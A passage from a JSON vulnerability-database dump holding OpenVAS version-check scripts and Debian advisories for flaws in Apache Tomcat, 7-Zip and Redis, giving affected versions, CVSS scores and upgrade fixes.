vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exist because defaults settings\n for the CORS filter provided in Apache Tomcat are insecure and enable\n 'supportsCredentials' for all origins.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to bypass certain security restrictions and perform unauthorized\n actions. This may aid in further attacks.\");\n\n script_tag(name:\"affected\", value:\"Apache Tomcat versions 9.0.0.M1 to 9.0.8\n Apache Tomcat versions 8.5.0 to 8.5.31\n Apache Tomcat versions 8.0.0.RC1 to 8.0.52\n Apache Tomcat versions 7.0.41 to 7.0.88\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Tomcat version 9.0.9,\n 8.0.53, 7.0.89 or 8.5.32 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://tomcat.apache.org/security-9.html\");\n script_xref(name:\"URL\", value:\"http://tomcat.apache.org/security-8.html\");\n script_xref(name:\"URL\", value:\"http://tomcat.apache.org/security-7.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\");\n script_mandatory_keys(\"apache/tomcat/detected\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"version_func.inc\");\n\nif(isnull(tomPort = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:tomPort, exit_no_version:TRUE))\n exit(0);\n\nappVer = infos['version'];\npath = infos['location'];\n\nif(appVer =~ \"^8\\.5\")\n{\n if(version_in_range(version:appVer, test_version: \"8.5.0\", test_version2: \"8.5.31\")){\n fix = \"8.5.32\";\n }\n}\nelse if(appVer =~ \"^7\\.0\")\n{\n if(version_in_range(version:appVer, test_version: \"7.0.41\", test_version2: \"7.0.88\")){\n fix = \"7.0.89\";\n }\n}\nelse if(appVer =~ \"^8\\.0\")\n{\n if((revcomp(a:appVer, b: \"8.0.0.RC1\") >= 0) && (revcomp(a:appVer, b: \"8.0.53\") < 0)){\n fix = \"8.0.53\";\n }\n}\nelse if(appVer =~ \"^9\\.0\")\n{\n if((revcomp(a:appVer, b: \"9.0.0.M1\") >= 0) && (revcomp(a:appVer, b: \"9.0.9\") < 0)){\n fix = \"9.0.9\";\n }\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix, install_path:path);\n security_message(port:tomPort, data: report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-20T18:49:30", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2018-1220)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014"], "modified": "2020-02-18T00:00:00", "id": "OPENVAS:1361412562311220181220", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181220", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1220\");\n script_version(\"2020-02-18T11:13:49+0000\");\n script_cve_id(\"CVE-2018-8014\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-18 11:13:49 +0000 (Tue, 18 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:17:54 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2018-1220)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1220\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1220\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'tomcat' package(s) announced via the EulerOS-SA-2018-1220 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.(CVE-2018-8014)\");\n\n script_tag(name:\"affected\", value:\"'tomcat' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-admin-webapps\", rpm:\"tomcat-admin-webapps~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-el-2.2-api\", rpm:\"tomcat-el-2.2-api~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsp-2.2-api\", rpm:\"tomcat-jsp-2.2-api~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-lib\", rpm:\"tomcat-lib~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-servlet-3.0-api\", rpm:\"tomcat-servlet-3.0-api~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-webapps\", rpm:\"tomcat-webapps~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10115"], "description": "7zip is prone to a RAR Denial of Service Vulnerability.", "modified": "2018-06-18T00:00:00", "published": "2018-05-11T00:00:00", "id": "OPENVAS:1361412562310107312", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107312", "type": "openvas", "title": "7zip RAR Denial of Service Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_7zip_win_rar_dos_vuln.nasl 10231 2018-06-18 03:58:33Z ckuersteiner $\n#\n# 7zip RAR Denial of Service Vulnerability (Windows)\n#\n# Authors:\n# Michael Martin <michael.martin@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107312\");\n script_version(\"$Revision: 10231 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-06-18 05:58:33 +0200 (Mon, 18 Jun 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-11 16:37:09 +0200 (Fri, 11 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_cve_id(\"CVE-2018-10115\");\n script_name(\"7zip RAR Denial of Service Vulnerability (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_7zip_detect_portable_win.nasl\");\n script_mandatory_keys(\"7zip/Win/Ver\");\n script_tag(name:\"summary\", value:\"7zip is prone to a RAR Denial of Service Vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"The script checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Incorrect initialization logic of RAR decoder objects in 7-Zip 18.03 and before\n can lead to usage of uninitialized memory, allowing remote attackers to cause a denial of service (segmentation fault)\n or execute arbitrary code via a crafted RAR archive.\");\n script_tag(name:\"affected\", value:\"7zip through version 18.03.\");\n script_tag(name:\"solution\", value:\"Upgrade to 7zip version 18.05 or later.\");\n script_xref(name:\"URL\", value:\"https://sourceforge.net/p/sevenzip/discussion/45797/thread/e730c709/?limit=25&page=1#b240\");\n exit(0);\n}\n\nCPE = \"cpe:/a:7-zip:7-zip\";\n\ninclude (\"host_details.inc\");\ninclude (\"version_func.inc\");\n\nif (!infos = get_app_version_and_location (cpe:CPE, exit_no_version:TRUE)) {\n exit (0);\n}\nvers = infos ['version'];\npath = infos ['location'];\n\nif (version_is_less (version:vers, test_version:\"18.05\")){\n report = report_fixed_ver (installed_version:vers, fixed_version:\"18.05\", install_path:path);\n security_message (port:0, data:report);\n exit (0);\n}\n\nexit (99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:55:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-11218", "CVE-2018-11219"], "description": "Multiple vulnerabilities were discovered in the Lua subsystem of Redis, a\npersistent key-value database, which could result in denial of service.", "modified": "2019-07-04T00:00:00", "published": "2018-06-17T00:00:00", "id": "OPENVAS:1361412562310704230", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704230", "type": "openvas", "title": "Debian Security Advisory DSA 4230-1 (redis - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4230-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704230\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-11218\", \"CVE-2018-11219\");\n script_name(\"Debian Security Advisory DSA 4230-1 (redis - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-17 00:00:00 +0200 (Sun, 17 Jun 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4230.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"redis on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 3:3.2.6-3+deb9u1.\n\nWe recommend that you upgrade your redis packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/redis\");\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities were discovered in the Lua subsystem of Redis, a\npersistent key-value database, which could result in denial of service.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"redis-sentinel\", ver:\"3:3.2.6-3+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"redis-server\", ver:\"3:3.2.6-3+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"redis-tools\", ver:\"3:3.2.6-3+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-04T16:47:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-11218", "CVE-2018-11219"], "description": "The remote host is missing an update for the ", "modified": "2020-06-03T00:00:00", "published": "2018-06-23T00:00:00", "id": "OPENVAS:1361412562310851796", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851796", "type": "openvas", "title": "openSUSE: Security Advisory for redis (openSUSE-SU-2018:1802-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851796\");\n script_version(\"2020-06-03T08:38:58+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-03 08:38:58 +0000 (Wed, 03 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-23 05:57:35 +0200 (Sat, 23 Jun 2018)\");\n script_cve_id(\"CVE-2018-11218\", \"CVE-2018-11219\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for redis (openSUSE-SU-2018:1802-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'redis'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for redis to 4.0.10 fixes the following issues:\n\n These security issues were fixed:\n\n - CVE-2018-11218: Prevent heap corruption vulnerability in cmsgpack\n (bsc#1097430).\n\n - CVE-2018-11219: Prevent integer overflow in Lua scripting (bsc#1097768).\n\n For Leap 42.3 and openSUSE SLE 12 backports this is a jump from 4.0.6.\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-667=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-667=1\");\n\n script_tag(name:\"affected\", value:\"redis on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:1802-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-06/msg00043.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"redis\", rpm:\"redis~4.0.10~17.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"redis-debuginfo\", rpm:\"redis-debuginfo~4.0.10~17.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"redis-debugsource\", rpm:\"redis-debugsource~4.0.10~17.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-11218", "CVE-2018-11219"], "description": "This host is running Redis and is prone to\n integer overflow and stack-based buffer overflow vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2018-06-18T00:00:00", "id": "OPENVAS:1361412562310813438", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813438", "type": "openvas", "title": "Redis Integer Overflow and Stack-Based Buffer Overflow Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Redis Integer Overflow and Stack-Based Buffer Overflow Vulnerabilities\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:redis:redis\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813438\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-11219\", \"CVE-2018-11218\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-18 15:33:41 +0530 (Mon, 18 Jun 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Redis Integer Overflow and Stack-Based Buffer Overflow Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Redis and is prone to\n integer overflow and stack-based buffer overflow vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A vulnerability within the 'struct' Lua package shipped with Redis which\n contains integer overflow due to failure in bound-checking statement.\n\n - A vulnerability within the 'cmsgpack' Lua package shipped with Redis which\n contains stack-based buffer overflows.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to conduct a denial-of-service condition, crashing the Redis server.\");\n\n script_tag(name:\"affected\", value:\"Redis versions before 3.2.12, 4.x before 4.0.10,\n and 5.x before 5.0 RC2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Redis version 3.2.12 or 4.0.10 or\n 5.0 RC2 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://antirez.com/news/119\");\n script_xref(name:\"URL\", value:\"https://raw.githubusercontent.com/antirez/redis/4.0/00-RELEASENOTES\");\n script_xref(name:\"URL\", value:\"https://raw.githubusercontent.com/antirez/redis/5.0/00-RELEASENOTES\");\n script_xref(name:\"URL\", value:\"https://raw.githubusercontent.com/antirez/redis/3.2/00-RELEASENOTES\");\n script_xref(name:\"URL\", value:\"https://redis.io\");\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Databases\");\n script_dependencies(\"gb_redis_detect.nasl\");\n script_require_ports(\"Services/redis\", 6379);\n script_mandatory_keys(\"redis/installed\");\n exit(0);\n}\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif(!port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE)) exit(0);\nversion = infos['version'];\n\nif(version_is_less(version:version, test_version: \"3.2.12\")){\n fix = \"3.2.12\";\n}\n\nelse if(version_in_range(version:version, test_version: \"4.0\",test_version2:\"4.0.9\")){\n fix = \"4.0.10\";\n}\n\n##5.0 RC1 is vulnerable\n##5.0 RC1 == 4.9.101\nelse if(version == \"4.9.101\"){\n fix = \"5.0 RC2\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:version, fixed_version: fix);\n security_message(port: port, data: report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-06-08T22:13:11", "description": "Package : redis\nVersion : 2:2.8.17-1+deb8u6\nCVE IDs : CVE-2018-11218, CVE-2018-11219, CVE-2018-12326\nDebian Bugs : #901495, #902410\n\nIt was discovered that there were a number of vulnerabilities in redis,\na persistent key-value database:\n\n * CVE-2018-11218, CVE-2018-11219: Multiple heap\n corruption and integer overflow vulnerabilities. (#901495)\n\n * CVE-2018-12326: Buffer overflow in the &quot;redis-cli&quot; tool which could\n have allowed an attacker to achieve code execution and/or escalate to\n higher privileges via a crafted command line. (#902410)\n\nFor Debian 8 &quot;Jessie&quot;, these issues have been fixed in redis version\n2:2.8.17-1+deb8u6.\n\nWe recommend that you upgrade your redis packages.\n\n\nRegards,\n\n- -- \n ,&#x27;&#x27;`.\n : :&#x27; : Chris Lamb\n `. `&#x27;` lamby@debian.org / chris-lamb.co.uk\n `-\n\n", "edition": 13, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-26T16:07:53", "title": "[SECURITY] [DLA DLA-1396-1] redis security update", "type": "debian", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11218", "CVE-2018-11219", "CVE-2018-12326"], "modified": "2018-06-26T16:07:53", "id": "DEBIAN:DLA-1396-1:3B04A", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201806/msg00003.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-08T22:21:01", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4230-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJune 17, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : redis\nCVE ID : CVE-2018-11218 CVE-2018-11219\n\nMultiple vulnerabilities were discovered in the Lua subsystem of Redis, a\npersistent key-value database, which could result in denial of service.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 3:3.2.6-3+deb9u1.\n\nWe recommend that you upgrade your redis packages.\n\nFor the detailed security status of redis please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/redis\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 11, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-17T15:47:56", "title": "[SECURITY] [DSA 4230-1] redis security update", "type": "debian", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11218", "CVE-2018-11219"], "modified": "2018-06-17T15:47:56", "id": "DEBIAN:DSA-4230-1:5B4A2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00159.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2021-07-28T14:35:19", "description": "Redis is an advanced key-value store. It is often referred to as a data-structure server since keys can contain strings, hashes, lists, sets, and sorted sets. For performance, Redis works with an in-memory data set. You can persist it either by dumping the data set to disk every once in a while, or by appending each command to a log.\n\nSecurity Fix(es):\n\n* redis: Heap corruption in lua_cmsgpack.c (CVE-2018-11218)\n\n* redis: Integer overflow in lua_struct.c:b_unpack() 